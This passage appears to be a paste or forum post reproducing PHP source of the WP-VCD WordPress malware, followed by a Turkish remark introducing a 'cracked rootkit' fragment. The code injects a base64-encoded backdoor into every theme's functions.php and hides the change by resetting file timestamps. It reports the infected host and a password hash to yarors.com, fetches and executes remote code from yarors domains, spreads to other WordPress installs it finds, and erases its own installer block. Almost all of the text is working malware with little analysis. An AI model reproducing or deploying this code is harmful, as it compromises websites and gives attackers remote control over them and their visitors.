ucGhwJykpCgkJCQkJCQkJewoJCQkJCQkJCQkkdGltZSA9IGZpbGVjdGltZSgkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyk7CgkJCQkJCQkJCQkKCQkJCQkJCQkJaWYgKCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChzdHJwb3MoJGNvbnRlbnQsICdXUF9WX0NEJykgPT09IGZhbHNlKQoJCQkJCQkJCQkJCQl7CgkJCQkJCQkJCQkJCQkkY29udGVudCA9ICRpbnN0YWxsX2NvZGUgLiAkY29udGVudCA7CgkJCQkJCQkJCQkJCQlAZmlsZV9wdXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcsICRjb250ZW50KTsKCQkJCQkJCQkJCQkJCXRvdWNoKCAkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyAsICR0aW1lICk7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCQllbHNlCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCSRwaW5nID0gZmFsc2U7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCX0KCQkJCQkJCQkJCQoJCQkJCQkJCX0KCQkJCQkJCQkKCQkJCQkJCQkKCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGxpc3QyID0gc2NhbmRpciggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyk7CgkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yZWFjaCAoJGxpc3QyIGFzICRfMikKCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAl7CgkJCQkJCQkJCQkJCQkJCQoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGZpbGVfZXhpc3RzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJykpCgkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgIHsKCQkJCQkJCQkJJHRpbWUgPSBmaWxlY3RpbWUoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKTsKCQkJCQkJCQkJCQoJCQkJCQkJCQlpZiAoJGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfMiAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChzdHJwb3MoJGNvbnRlbnQsICdXUF9WX0NEJykgPT09IGZhbHNlKQoJCQkJCQkJCQkJCQl7CgkJCQkJCQkJCQkJCQkkY29udGVudCA9ICRpbnN0YWxsX2NvZGUgLiAkY29udGVudCA7CgkJCQkJCQkJCQkJCQlAZmlsZV9wdXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnLCAkY29udGVudCk7CgkJCQkJCQkJCQkJCQl0b3VjaCggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnICwgJHRpbWUgKTsKCQkJCQkJCQkJCQkJCSRwaW5nMiA9IHRydWU7CgkJCQkJCQkJCQkJCX0KCgoKCgoKCgoJCQkJCQkJCQkJCWVsc2UKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJLy8kcGluZyA9IGZhbHNlOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJCQkKCQkJCQkJCQl9CgoKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCX0KCQkJCQkJCgkJCQkJaWYgKCRwaW5nKSB7CgkJCQkJCSRjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3Lnlhcm9ycy5jb20vby5waHA/aG9zdD0nIC4gJF9TRVJWRVJbIkhUVFBfSE9TVCJdIC4gJyZwYXNzd29yZD0nIC4gJGluc3RhbGxfaGFzaCk7CgkJCQkJCS8vQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnL3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3Lnlhcm9ycy5jb20vYWRtaW4udHh0JykpOwoJCQkJCX0KCQkJCQkKCQkJCQkJCQkJCQkJCQkJaWYgKCRwaW5nMikgewoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy55YXJvcnMuY29tL28ucGhwP2hvc3Q9JyAuICRfU0VSVkVSWyJIVFRQX0hPU1QiXSAuICcmcGFzc3dvcmQ9JyAuICRpbnN0YWxsX2hhc2gpOwoJCQkJCQkvL0BmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vd3d3Lnlhcm9ycy5jb20vYWRtaW4udHh0JykpOwovL2VjaG8gQUJTUEFUSCAuICd3cC1pbmNsdWRlcy9jbGFzcy53cC5waHAnOwoJCQkJCX0KCQkJCQkKCQkJCQkKCQkJCQkKCQkJCX0KCQkKCgoKCj8+PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOz8+';

$GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media', 'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes');

$GLOBALS['DIR_ARRAY'] = Array();
$dirs = Array();

$search = Array(
Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'),
);

function getDirList($path)
{
if ($dir = @opendir($path))
{
$result = Array();

while (($filename = @readdir($dir)) !== false)
{
if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename))
$result[] = $path . '/' . $filename;
}

return $result;
}

return false;
}

function WP_URL_CD($path)
{
if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
{
if (strpos($file, 'wp-vcd') === false) {
$file = '' . $file;
file_put_contents($path . '/wp-includes/post.php', $file);
//@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
}
}
}

function SearchFile($search, $path)
{
if ($dir = @opendir($path))
{
$i = 0;
while (($filename = @readdir($dir)) !== false)
{
if ($i > MAX_ITERATION) break;
$i++;
if ($filename != '.' && $filename != '..')
{
if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey']))
{
SearchFile($search, $path . '/' . $filename);
}
else
{
foreach ($search as $_)
{
if (strtolower($filename) == strtolower($_['file']))
{
$GLOBALS['DIR_ARRAY'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename);
}
}
}
}
}
}
}

if (is_admin() && (($pagenow == 'themes.php') || ($_GET['action'] == 'activate') || (isset($_GET['plugin']))) ) {

if (isset($_GET['plugin']))
{
global $wpdb ;
}

$install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nZTg2NGNhYWFmYWUzODc0MzZhYzY2ZDQxMDA3NzFlODknOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cueWFyb3JzLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3Lnlhcm9ycy5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy55YXJvcnMucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cueWFyb3JzLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4=';

$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));


$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}

}

else
{

$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}
else
{
//$ping2 = true;
}
}

}



}

}








}

if ($ping) {
$content = @file_get_contents('http://www.yarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}

if ($ping2) {
$content = @file_get_contents('http://www.yarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}

}


for ($i = 0; $i {
$dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1));
}

foreach ($dirs as $dir)
{
foreach (@getDirList($dir) as $__)
{
@SearchFile($search, $__);
}
}

foreach ($GLOBALS['DIR_ARRAY'] as $e)
{
//print_r($e);

if ($file = file_get_contents($e[1]))
{
WP_URL_CD(dirname($e[1]));

if (preg_match('|\'AUTH_SALT\'\s*\,\s*\'(.*?)\'|s', $file, $salt))
{
if ($salt[1] != AUTH_SALT)
{
// WP_URL_CD(dirname($e[1]));
//echo dirname($e[1]);
}
}
}
}

if ($file = @file_get_contents(__FILE__))
{
$file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
$file = preg_replace('!<\?php\s*\?>!s', '', $file);
@file_put_contents(__FILE__, $file);
}

}

//install_code_end

?>





Kırdığım rootkit dosyası:



//install_code1
error_reporting(0);
ini_set('display_errors', 0);
//AKZXJyb3JfcmVwb3J0aW5nKDApOwovL21
DEFINE('MAX_LEVEL', 2);
//iMjUwCmluaV9zZXQoJ2Rp
DEFINE('MAX_ITERATION', 50);
//U1JIMG5LU2tLQ1hzS0
